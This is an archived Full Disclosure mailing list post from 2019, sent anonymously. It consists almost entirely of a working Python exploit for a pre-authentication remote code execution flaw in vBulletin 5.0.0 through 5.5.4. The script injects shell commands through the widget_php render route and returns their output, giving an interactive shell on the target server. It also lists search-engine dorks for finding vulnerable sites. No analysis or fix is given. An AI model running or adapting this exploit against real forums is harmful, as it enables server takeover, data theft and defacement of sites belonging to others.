[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] vBulletin 5.x 0day pre-auth RCE exploit

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] vBulletin 5.x 0day pre-auth RCE exploit
From: i0su9z+32fpome4pivgiwtzjw--- via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Mon, 23 Sep 2019 23:05:55 +0000

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))





----
Sent using Guerrillamail.com
Block or report abuse: 
https://www.guerrillamail.com//abuse/?a=R1R4CQkJULcZhx2h4ns%2FYRHEQcODxsQeyLZF



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] XSSer v.1.8[1] - "The Hive!" released
Next by Date: [FD] [CVE-2019-16253] Privilege Escalation in Samsung Mobile Android SamsungTTS Component
Previous by thread: [FD] XSSer v.1.8[1] - "The Hive!" released
Next by thread: [FD] [CVE-2019-16253] Privilege Escalation in Samsung Mobile Android SamsungTTS Component
Index(es):
- Date
- Thread